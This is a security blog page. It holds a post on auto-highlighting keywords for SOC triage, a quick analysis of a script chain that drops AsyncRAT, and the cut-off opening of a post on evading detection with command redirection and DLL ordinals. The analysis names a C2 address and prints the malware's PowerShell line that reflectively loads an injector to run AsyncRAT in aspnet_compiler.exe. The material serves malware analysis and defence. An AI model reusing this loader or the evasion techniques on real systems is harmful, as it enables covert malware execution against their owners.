<p>boredhackerblog: I am posting because I'm bored.</p><p><b>Speeding up report reading and security/SOC alert triaging by auto-highlighting keywords on webpages</b> (2023-12-21)</p><p><b>Introduction:</b></p><p>If you're a security analyst or threat researcher, you may spend a lot of time reading reports/blogs or looking through a SIEM. </p><p>It might get annoying to look for specific keywords/fields when looking through things, especially SIEM output. I know I had this issue.</p><p>I thought it'd be nice to have an extension that auto-highlighted things for me. While looking for such an extension, I found the "Highlight This" extension. There are multiple extensions like that, but this one took a URL for the keyword list, so I thought it was perfect to pair it with GitHub as I may be adding/removing keywords.</p><p>The extension can be found here: <a href="https://chromewebstore.google.com/detail/highlight-this-finds-and/fgmbnmjmbjenlhbefngfibmjkpbcljaj?pli=1">https://chromewebstore.google.com/detail/highlight-this-finds-and/fgmbnmjmbjenlhbefngfibmjkpbcljaj?pli=1</a></p><p>Developer's sites:</p><p><a href="https://highlightthis.net/">https://highlightthis.net/</a></p><p><a href="https://deboel.eu/">https://deboel.eu/</a></p><p>The extension developer does have an optional subscription service which gives you additional abilities (<a href="https://highlightthis.net/Subscription.html">https://highlightthis.net/Subscription.html</a>).</p><p><br /></p><p>The GitHub repo I'm using this with is here: <a href="https://github.com/BoredHackerBlog/highlight_keywords">https://github.com/BoredHackerBlog/highlight_keywords</a></p><p>You should probably make your own list based on your needs.</p><p><b>Setup:</b></p><p>Download the extension and remove the default list. 
Activate subscription or activate free version (or try unlimited version for a limited time)</p><p>Add a new list. In my case, I'm pulling a list of keywords from Github so I can keep updating the list on Github in the future.</p><p>Add a list URL and customize all other options then start browsing!</p><p>I disabled "Only detect complete words" which can cause some bad highlighting, I'd recommend messing around and finding what works best for you.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgP1NDGBl8EtBklZbzEEWSSJsnQnD17RgmBNbPvcx440bZ7e1m2wkSXDemcWKkE7riZAIuFVnyMtO1_hn_w9TQ7wX4i37FbF4UQPaU7g2uPXN99dMG-WP9VFp8rkF-Dte3o4Y9nTDD9RDRgbw-9z5CN1_yWyKTdOcaUKPUDwWwJetD3LhyNlnVagGjqTlM" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="180" data-original-width="188" height="135" src="https://blogger.googleusercontent.com/img/a/AVvXsEgP1NDGBl8EtBklZbzEEWSSJsnQnD17RgmBNbPvcx440bZ7e1m2wkSXDemcWKkE7riZAIuFVnyMtO1_hn_w9TQ7wX4i37FbF4UQPaU7g2uPXN99dMG-WP9VFp8rkF-Dte3o4Y9nTDD9RDRgbw-9z5CN1_yWyKTdOcaUKPUDwWwJetD3LhyNlnVagGjqTlM=w141-h135" width="141" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhlLSo1sFAoI_suNnN5U-NpfpQt0RnX3UXyNhKmbBaHz2IylnwUv_I-_wUGVHU46J_2F_mcAtT30uj3zxgYg7OheWA_jEOs7UhspHuScIgJG8Q1hAUlmnVldGh9wzaThPYBxwsLWo8VMLTSJtsRwC65lg03ra6DERdkUO68XhmedWImy5ZPNd1dSvs0ong" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="738" data-original-width="940" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhlLSo1sFAoI_suNnN5U-NpfpQt0RnX3UXyNhKmbBaHz2IylnwUv_I-_wUGVHU46J_2F_mcAtT30uj3zxgYg7OheWA_jEOs7UhspHuScIgJG8Q1hAUlmnVldGh9wzaThPYBxwsLWo8VMLTSJtsRwC65lg03ra6DERdkUO68XhmedWImy5ZPNd1dSvs0ong" width="306" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhE6ferxbPjjOYs2zoA809x0Uz-7lD5OEErNSLITSq7KVXynh68yZyF_jSbX8TJAkZ__eyasFfP43dTPq4WV0UL-8VrTch23hLtK8f1mGr_3t3n1kbRajdNB73iGgxxT3rjyVQhSfyNppvMD9gSJU3Z_0qonp7DYga8bWU-evytYsUniCrCxYc-ID45VCA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="502" data-original-width="952" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEhE6ferxbPjjOYs2zoA809x0Uz-7lD5OEErNSLITSq7KVXynh68yZyF_jSbX8TJAkZ__eyasFfP43dTPq4WV0UL-8VrTch23hLtK8f1mGr_3t3n1kbRajdNB73iGgxxT3rjyVQhSfyNppvMD9gSJU3Z_0qonp7DYga8bWU-evytYsUniCrCxYc-ID45VCA" width="320" /></a></div><br /><p></p><p>The extension also gives you a report of the things it detected:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh_ynrI1No2bFuuX6uwd-zQOXNWsh3EX8FxhiTvAuGsuX4phWjQc3ZUW0jSL_QovJKLZlV_geM4QsbrbzeymcDjCwOm8Nr_gTocLY97kNHbBtLIpkJjgbx5QTkgsqrdGrmSfyEMHNTJaw8C-7ogBLesCURPB5osIdgfCLEZ5u1P6diDidScLsnYZZzjNQo" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="544" data-original-width="856" height="203" src="https://blogger.googleusercontent.com/img/a/AVvXsEh_ynrI1No2bFuuX6uwd-zQOXNWsh3EX8FxhiTvAuGsuX4phWjQc3ZUW0jSL_QovJKLZlV_geM4QsbrbzeymcDjCwOm8Nr_gTocLY97kNHbBtLIpkJjgbx5QTkgsqrdGrmSfyEMHNTJaw8C-7ogBLesCURPB5osIdgfCLEZ5u1P6diDidScLsnYZZzjNQo" width="320" /></a></div><br /><br /><p></p><p><b>Results:</b></p><p>The DFIR Report page kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhu3dmoZsuNlZiIGh7Fn7JOZQoh40LFDez3bec10TgfN2DZuCQrXxhMvkGUTtb9ThlETm-Oa3X5uA3AoQ84gmAI7Q-4VjvEeXtIuCjoGmzIdoh_KjU-dPKuml2LA8FK5EElX_57kteuZher23EvN57zkH8_ZYzV5f8oC1k7UB9MiUkcPaQX4z8YKZIRUgw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="2006" data-original-width="1972" height="449" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhu3dmoZsuNlZiIGh7Fn7JOZQoh40LFDez3bec10TgfN2DZuCQrXxhMvkGUTtb9ThlETm-Oa3X5uA3AoQ84gmAI7Q-4VjvEeXtIuCjoGmzIdoh_KjU-dPKuml2LA8FK5EElX_57kteuZher23EvN57zkH8_ZYzV5f8oC1k7UB9MiUkcPaQX4z8YKZIRUgw=w442-h449" width="442" /></a></div><br /><a href="https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/">https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/</a><p></p><p>Some XML sample logs:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAokM1Ic3IDimTqRghSCBEkJS6xyVNBjoMLY-T7XWxSxyZmmqk6kcPqjrYwXmF-bZiC5wgcxXyyk_JnMuMC-QVYjsK0t0xFeAxym-rWv2gE0lzsLackwIVxEMMxggjTBbruaKIqopVm0wCaRkoqKU-ARbUoJ0dSn1oVyVhxyCBicnKpdlgh_NzchzuSOw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1508" data-original-width="1752" height="340" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAokM1Ic3IDimTqRghSCBEkJS6xyVNBjoMLY-T7XWxSxyZmmqk6kcPqjrYwXmF-bZiC5wgcxXyyk_JnMuMC-QVYjsK0t0xFeAxym-rWv2gE0lzsLackwIVxEMMxggjTBbruaKIqopVm0wCaRkoqKU-ARbUoJ0dSn1oVyVhxyCBicnKpdlgh_NzchzuSOw=w395-h340" width="395" /></a></div><br /><a href="https://github.com/BoredHackerBlog/mitre_attack_xml_eventlogs/">https://github.com/BoredHackerBlog/mitre_attack_xml_eventlogs/</a><p></p><p><br /></p><p><br /></p><p><b>Quick sample analysis which ended up dropping AsyncRAT</b> (2023-11-17)</p><p>I came across a sample involving traffic to 91.92.242.28:222.</p><p>There is a sandbox report here: <a href="https://tria.ge/231113-v9lgtaec41">https://tria.ge/231113-v9lgtaec41</a></p><p>I only looked at it because it involved so many files.</p><p>This is a very quick and lazy analysis. 
I didn't spend time decompiling .NET.</p><p>At the time of analysis, the page had an open directory.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiz-Rw8M0JEGchIPP0ZtuJ4h3R1216e0GsMawAQqS1yxq45zz7qb-5WmraoDypHJ23nLnJ5_CESERFtcMFRuLEEbj5ezKIKGuuR4PReQEesJJyaEeiPs-UgS9ij4_51tb4BucmBKziuPYQM3ibWXADLt57stMaiu8wEEW1c_XmiJ_YQw4du1l7_ATpu65M" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="266" data-original-width="962" height="88" src="https://blogger.googleusercontent.com/img/a/AVvXsEiz-Rw8M0JEGchIPP0ZtuJ4h3R1216e0GsMawAQqS1yxq45zz7qb-5WmraoDypHJ23nLnJ5_CESERFtcMFRuLEEbj5ezKIKGuuR4PReQEesJJyaEeiPs-UgS9ij4_51tb4BucmBKziuPYQM3ibWXADLt57stMaiu8wEEW1c_XmiJ_YQw4du1l7_ATpu65M" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">There is a script and a .jpg file which is actually a zip file.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjiL4BNvKGxFruOX31hs8IyQjScMD4FlxAY0hlcRlMj_WD0-44n2GrEigd7UUk2__hp34oKr1w973u0JnaF-ku2b5rG6E_mKz5uUoKtNy4f-KLZ-UC0bKBic_v3syH4F8tszDEtUqEdfGgapIszbw1Bj7Iuz2LD_WSQhhQaMGo33esSA5ah0QZHJSwUPr0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="536" data-original-width="1006" height="170" src="https://blogger.googleusercontent.com/img/a/AVvXsEjiL4BNvKGxFruOX31hs8IyQjScMD4FlxAY0hlcRlMj_WD0-44n2GrEigd7UUk2__hp34oKr1w973u0JnaF-ku2b5rG6E_mKz5uUoKtNy4f-KLZ-UC0bKBic_v3syH4F8tszDEtUqEdfGgapIszbw1Bj7Iuz2LD_WSQhhQaMGo33esSA5ah0QZHJSwUPr0" width="320" /></a></div><br />The script downloads the zip, extracts it to the Public folder and initially starts the f1.vbs file.<p></p><p>The zip file has several files:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEh8EFEEwhY20ut2cTJAsq6kpOe9PhpuAIjKGIiZ5nYwG3lUnFuJYl2zbRK5c9gT94wZcc6Kun7nsSLnQUXtPXlyh8BxWN51HfQhGp3mb73ydSJdYmH3SifEKFgXolg3JpuohbXkvcSYikGVUT7hwECoGPAOQHdbhdB7rOwEo62lvx1k_r6Zv9RpR5gl51c" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="670" data-original-width="1252" height="266" src="https://blogger.googleusercontent.com/img/a/AVvXsEh8EFEEwhY20ut2cTJAsq6kpOe9PhpuAIjKGIiZ5nYwG3lUnFuJYl2zbRK5c9gT94wZcc6Kun7nsSLnQUXtPXlyh8BxWN51HfQhGp3mb73ydSJdYmH3SifEKFgXolg3JpuohbXkvcSYikGVUT7hwECoGPAOQHdbhdB7rOwEo62lvx1k_r6Zv9RpR5gl51c=w498-h266" width="498" /></a></div><br /><p></p><p>f1.vbs ends up launching f1.bat</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg-CF6BKu8M_1qGoDMJWgYxOkkrmXGTQVJr1C3eKKxRQLrLfDw2xB1x0wrc5-aKgk1NOluv8WBoA3sjlu1He90IlRp1oOZxC3FncLKphlZj2QBSnS9xXk0CHE31Quinv8rvnqkT0m8Tk-AepJfNbNIUiOGDUIl3wMKke87Oev1s1Q6Qbe2AzOQ5qRrr4MY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="174" data-original-width="564" height="99" src="https://blogger.googleusercontent.com/img/a/AVvXsEg-CF6BKu8M_1qGoDMJWgYxOkkrmXGTQVJr1C3eKKxRQLrLfDw2xB1x0wrc5-aKgk1NOluv8WBoA3sjlu1He90IlRp1oOZxC3FncLKphlZj2QBSnS9xXk0CHE31Quinv8rvnqkT0m8Tk-AepJfNbNIUiOGDUIl3wMKke87Oev1s1Q6Qbe2AzOQ5qRrr4MY" width="320" /></a></div><br />f1.bat ends up launching powershell and f1.ps1<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjnNGTAxxF0fCSCnVWZp6M4gjTPGGOzKS4q5I6WuBO3pW8V1ivZR9u9aDfpCL0zz_dJHgy6GtdSOi82XwHYIBgox1lb5zNoaUYB1SYkelSkU0byTejA7IUd9Y6P2_rq-KXxb0oTEClP0zCl_Bc_KtLZxFjl9u8bGZwowmzwS7ZKhdKCPbxu6R3KFwT3dTk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="312" data-original-width="950" height="105" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEjnNGTAxxF0fCSCnVWZp6M4gjTPGGOzKS4q5I6WuBO3pW8V1ivZR9u9aDfpCL0zz_dJHgy6GtdSOi82XwHYIBgox1lb5zNoaUYB1SYkelSkU0byTejA7IUd9Y6P2_rq-KXxb0oTEClP0zCl_Bc_KtLZxFjl9u8bGZwowmzwS7ZKhdKCPbxu6R3KFwT3dTk" width="320" /></a></div><br />Powershell sets up a scheduled task to launch tron.vbs<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh5Pk9hgUYC5cbM2zqbThn2i7nKTOimCtS0q-m-MTsy1yY6KNiBkh86H8w7EewdhJjPEemnEA6NVzcSjRzh_9nHWnlM4KxpfbpCM7jeoQ36PmEIce5PtPVcUt0X_U_-Ex61vheLIdKNmnb97Qoo5G0CxsgjIIlY7y-Os6IHnhZXR_As4yWuTdOPLJkDqaM" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="1214" height="205" src="https://blogger.googleusercontent.com/img/a/AVvXsEh5Pk9hgUYC5cbM2zqbThn2i7nKTOimCtS0q-m-MTsy1yY6KNiBkh86H8w7EewdhJjPEemnEA6NVzcSjRzh_9nHWnlM4KxpfbpCM7jeoQ36PmEIce5PtPVcUt0X_U_-Ex61vheLIdKNmnb97Qoo5G0CxsgjIIlY7y-Os6IHnhZXR_As4yWuTdOPLJkDqaM=w504-h205" width="504" /></a></div><br />tron.vbs launches tron.bat<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjAUokm38dn2e0Ktkezzdc1O4Dr7--8Z7jDk0IXC5jBnlBwHoMkEpQJ-LNuiHKG2dcJRGivRXhtCmxEaJJRc8NKdus7-BDy9Uaa6jf3OAba-sdyiJlyfBaVjjWPq1nluPcCaQSwiC7AB6OvBRfP5tzVSGvtvvpx_S7W5zL_YenRXagdj7zwTkt3W1pd-To" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="144" data-original-width="576" height="80" src="https://blogger.googleusercontent.com/img/a/AVvXsEjAUokm38dn2e0Ktkezzdc1O4Dr7--8Z7jDk0IXC5jBnlBwHoMkEpQJ-LNuiHKG2dcJRGivRXhtCmxEaJJRc8NKdus7-BDy9Uaa6jf3OAba-sdyiJlyfBaVjjWPq1nluPcCaQSwiC7AB6OvBRfP5tzVSGvtvvpx_S7W5zL_YenRXagdj7zwTkt3W1pd-To" width="320" /></a></div><br />tron.bat launches tron.ps1<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjYkdNbmNDss5secpdO3A5GLF-jWFBQrIpmzpQ6QqyErMrANBhFzd_RwPvhOiuL4d6pdfnC2BMcJZ7_BpejfQVlfsr4ypbXcTA560qgilyi39e5CmTRjcT92X2xy5AkKglAQ0M-86tMniX-pHo7_AfCPNoHUgh2dpTrNq4qSR-y0URUCWnoDfDcd6ne8a0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="310" data-original-width="912" height="109" src="https://blogger.googleusercontent.com/img/a/AVvXsEjYkdNbmNDss5secpdO3A5GLF-jWFBQrIpmzpQ6QqyErMrANBhFzd_RwPvhOiuL4d6pdfnC2BMcJZ7_BpejfQVlfsr4ypbXcTA560qgilyi39e5CmTRjcT92X2xy5AkKglAQ0M-86tMniX-pHo7_AfCPNoHUgh2dpTrNq4qSR-y0URUCWnoDfDcd6ne8a0" width="320" /></a></div><br />This is where things are kinda interesting (relative to all the stuff above...)<p></p><p>The PowerShell script has functions to decode/deobfuscate the other files.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhq_wpK_2ovlBdARRcrT47o9wANbbzqCvcFbnczmoY-uCNbye8Kshfs9iDJJkv-GlC5MI4ehfkoY1s4l8aB2T_AkKoxRzmM3Ab6J-v8VJGRJs74anSPTlJVvg23owVWgGri3UGz6bl3GUDCV7ujR8o5njycCUnT3p6VBN3pI1RDidE5-jB5Pr9FV6Lc1A4" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="536" data-original-width="1150" height="248" src="https://blogger.googleusercontent.com/img/a/AVvXsEhq_wpK_2ovlBdARRcrT47o9wANbbzqCvcFbnczmoY-uCNbye8Kshfs9iDJJkv-GlC5MI4ehfkoY1s4l8aB2T_AkKoxRzmM3Ab6J-v8VJGRJs74anSPTlJVvg23owVWgGri3UGz6bl3GUDCV7ujR8o5njycCUnT3p6VBN3pI1RDidE5-jB5Pr9FV6Lc1A4=w532-h248" width="532" /></a></div><br />If we look at the runpe and msg files, which the script loads next, it's pretty easy to see a partial MZ header.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEimbow3o_18-MGcd46ocJ9ZIrCvZC_i_2PdWgZFyyBfob2z83GXLHbaQnld502XEny8P9nmRm0I3R0DwvlXzQ7YF6_DvMj6w7h7bovjjojUBbJE3jRExXOYFZ9JWcPHCy-Q3PQhr0mh-kqT_Pj21EfbAOCB0PaIxodTUsqsewcaN8qJ-ZsysF8OhoXQuYY" style="margin-left: 1em; 
margin-right: 1em;"><img alt="" data-original-height="214" data-original-width="1932" height="74" src="https://blogger.googleusercontent.com/img/a/AVvXsEimbow3o_18-MGcd46ocJ9ZIrCvZC_i_2PdWgZFyyBfob2z83GXLHbaQnld502XEny8P9nmRm0I3R0DwvlXzQ7YF6_DvMj6w7h7bovjjojUBbJE3jRExXOYFZ9JWcPHCy-Q3PQhr0mh-kqT_Pj21EfbAOCB0PaIxodTUsqsewcaN8qJ-ZsysF8OhoXQuYY=w673-h74" width="673" /></a></div><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjRBsmy17Av71g5O-kSG2HxUlRDcBCw3MPRfhRQt6irxpfMGfqaCDHyeJx03GlOXj84WGBB0oX8Xa8P-ib2rizsrrNWxfRJ_ddiSYY9cb-6tMkWCi3T_ma4S5UPFPCFmH1TunuP-6mdtMJ5d5ncgKTGJXElcQDHNiO5uN64oHqhPz8D31BeNXmf2XdkOmw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="108" data-original-width="274" height="126" src="https://blogger.googleusercontent.com/img/a/AVvXsEjRBsmy17Av71g5O-kSG2HxUlRDcBCw3MPRfhRQt6irxpfMGfqaCDHyeJx03GlOXj84WGBB0oX8Xa8P-ib2rizsrrNWxfRJ_ddiSYY9cb-6tMkWCi3T_ma4S5UPFPCFmH1TunuP-6mdtMJ5d5ncgKTGJXElcQDHNiO5uN64oHqhPz8D31BeNXmf2XdkOmw" width="320" /></a></div><br />Next it loads text from files for execution<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEggfrd72FzCEsWVbLilp-ZJUaPDldo05BB-jRxj_7Jm3kKO4r3j1dTd18vagaiI7wi6WBjzJldZEsDGDR9kf9MbhDQ2HLENsKQusP34MEVRQ5uJ4D9GcjS7tnuwfLBKp50GR4POvgjwN72uy-s6qMQSIPxJWI8VuK08qjJzWbP_U3KUo6nKFekWGlC9o9Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="540" data-original-width="1676" height="186" src="https://blogger.googleusercontent.com/img/a/AVvXsEggfrd72FzCEsWVbLilp-ZJUaPDldo05BB-jRxj_7Jm3kKO4r3j1dTd18vagaiI7wi6WBjzJldZEsDGDR9kf9MbhDQ2HLENsKQusP34MEVRQ5uJ4D9GcjS7tnuwfLBKp50GR4POvgjwN72uy-s6qMQSIPxJWI8VuK08qjJzWbP_U3KUo6nKFekWGlC9o9Q=w578-h186" width="578" /></a></div><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" 
style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg23uRlvHODmpBkffQ90bdgm3-k7qEuJADqQRsvtudOyHbq0yXSvLPBFB_ZchcuH8p2cU_tA4geFKubG-EgyF48TCkKKMrBHtWZKgYaY30HWU9_7h7sueTif4mJMwBwtAXLq723lcqukLJwFzom2RPFsAbDlXfpnzBzcKabNzmZi8aNWO7Yy8shVRmK3sQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="478" data-original-width="1228" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEg23uRlvHODmpBkffQ90bdgm3-k7qEuJADqQRsvtudOyHbq0yXSvLPBFB_ZchcuH8p2cU_tA4geFKubG-EgyF48TCkKKMrBHtWZKgYaY30HWU9_7h7sueTif4mJMwBwtAXLq723lcqukLJwFzom2RPFsAbDlXfpnzBzcKabNzmZi8aNWO7Yy8shVRmK3sQ=w589-h230" width="589" /></a></div><br /><br /></div>It would finally run this:<br /><p></p><p>$Coment is runpe.txt data and $JR is msg.txt data.</p><p>$u = [Reflection.Assembly]</p><p>$u::Load($Coment).GetType(NewPE2.PE).GetMethod(Execute).Invoke($null,[object[]] (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,$null,$JR,$true))</p><p>https://learn.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load?view=net-7.0 </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj-dHWTZj65Ng0qEqAGzYhJVqNm5fuTnKzuT8yvlZ49G31_1Ef7UnSZw7vA-Bk7E9gHsAIXCYkXZYL90BxquBqzDd7gm6i1jdoMRoT90OMob2XFvEHNAANt0XmHSrzI-IwIHbjVpO9OJ_g-LNkCIZyCdMS88d1lrVeypqJ_qQr79N73D-e1udFaBCXc4OQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="190" data-original-width="908" height="115" src="https://blogger.googleusercontent.com/img/a/AVvXsEj-dHWTZj65Ng0qEqAGzYhJVqNm5fuTnKzuT8yvlZ49G31_1Ef7UnSZw7vA-Bk7E9gHsAIXCYkXZYL90BxquBqzDd7gm6i1jdoMRoT90OMob2XFvEHNAANt0XmHSrzI-IwIHbjVpO9OJ_g-LNkCIZyCdMS88d1lrVeypqJ_qQr79N73D-e1udFaBCXc4OQ=w551-h115" width="551" /></a></div><br />I saved the PE files after they were decoded/deobfuscated. 
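<br /><br />As an added example (my own code, not from this post), the check below is what I'd run over decoded blobs like these to confirm they really are PE images and whether they carry a CLR runtime header, i.e. are .NET assemblies like the runpe and msg payloads. The headers it parses are constructed for the demo, and the function names are my own; nothing here is the sample's data.<br />

```python
"""Confirm that decoded blobs are PE images and whether they are .NET assemblies.

Added example, not code from the post. Reads the DOS header, follows e_lfanew to
the PE signature, parses the COFF and optional headers and reports whether the
CLR runtime header data directory is populated (a managed .NET assembly).
"""
import struct

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def inspect_pe(blob: bytes) -> dict:
    """Return basic facts about a blob: is it a PE, machine type, PE32/PE32+, .NET?"""
    info = {"is_pe": False, "machine": None, "pe32plus": None, "is_dotnet": False}
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 2 or opt + opt_size > len(blob):
        return info
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == PE32_MAGIC:
        pe32plus, ndirs_off, dirs_off = False, opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        pe32plus, ndirs_off, dirs_off = True, opt + 108, opt + 112
    else:
        return info
    info.update(is_pe=True, machine=machine, pe32plus=pe32plus)
    ndirs = struct.unpack_from("<I", blob, ndirs_off)[0]
    clr_off = dirs_off + CLR_DIRECTORY_INDEX * 8
    if ndirs > CLR_DIRECTORY_INDEX and clr_off + 8 <= opt + opt_size:
        rva, size = struct.unpack_from("<II", blob, clr_off)
        info["is_dotnet"] = rva != 0 and size != 0
    return info


def label(blob: bytes) -> str:
    """One-word triage label for a decoded blob."""
    info = inspect_pe(blob)
    if not info["is_pe"]:
        return "not-a-pe"
    return "dotnet-pe" if info["is_dotnet"] else "native-pe"


def _build_sample(dotnet: bool) -> bytes:
    """Construct a minimal PE32 header (demo data, not a real sample)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 96 + 16 * 8  # PE32 fixed fields plus 16 data directories
    # Machine = I386, one section, Characteristics = EXECUTABLE | 32BIT | DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    if dotnet:
        # A non-zero CLR runtime header RVA/size marks a managed assembly
        struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed inputs standing in for decoded dropper files
SAMPLES = {
    "dotnet_payload": _build_sample(dotnet=True),
    "native_dll": _build_sample(dotnet=False),
    "plain_text": b"This is just text, not an executable image",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name}: {label(blob)} {inspect_pe(blob)}")
```

<br />The CLR directory (index 14) is the quickest static tell for a managed assembly, and it is what makes the final <span style="font-family: courier;">[Reflection.Assembly]::Load</span> step work at all, since Assembly.Load only accepts managed images.<br />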
<p></p><p>msg was AsyncRAT:</p><p><a href="https://www.virustotal.com/gui/file/a11cc3de26de3241be5f24c8c0d3e44b16e4fee35b8a306026e86590ccd8a0c1?nocache=1">https://www.virustotal.com/gui/file/a11cc3de26de3241be5f24c8c0d3e44b16e4fee35b8a306026e86590ccd8a0c1?nocache=1</a></p><p>runpe was the injector:</p><p><a href="https://www.virustotal.com/gui/file/a550a06a66009040462411867fce966b24499290d08bac8b3596f715cd5c6596?nocache=1">https://www.virustotal.com/gui/file/a550a06a66009040462411867fce966b24499290d08bac8b3596f715cd5c6596?nocache=1</a></p><p><br /></p><p>So many files and so much execution just to drop AsyncRAT.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXPMV8gdMB71I3GWIupmvgXJ5yl-wfV1sZSIrdFKLwFj5VyFG7w23mIZi6mB6BPEiT-SYwhE0V3T9RohDC9XTQ7jgFeCgc5GM451JQ_tYKrcwOb0KMk6Jj6pvhM3OWyPZzQsrx_NYs3C_coWlbM-1OcMWUHPc5gHRvPeWbuZvVHXv17bIRMPMiP5RbTao" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="626" data-original-width="834" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXPMV8gdMB71I3GWIupmvgXJ5yl-wfV1sZSIrdFKLwFj5VyFG7w23mIZi6mB6BPEiT-SYwhE0V3T9RohDC9XTQ7jgFeCgc5GM451JQ_tYKrcwOb0KMk6Jj6pvhM3OWyPZzQsrx_NYs3C_coWlbM-1OcMWUHPc5gHRvPeWbuZvVHXv17bIRMPMiP5RbTao" width="320" /></a></div><br /><br /><p></p><p><b>Using command line redirection and DLL ordinals to potentially bypass detections</b> (2023-10-22)</p><p>I came across this during a pentest. The techniques mentioned here are not new and there are already some detections in place, but I don't see these techniques being used regularly...</p><p><br /></p><p><b>Command redirection</b></p><p>The concept of command-line redirection is well known and commonly used. 
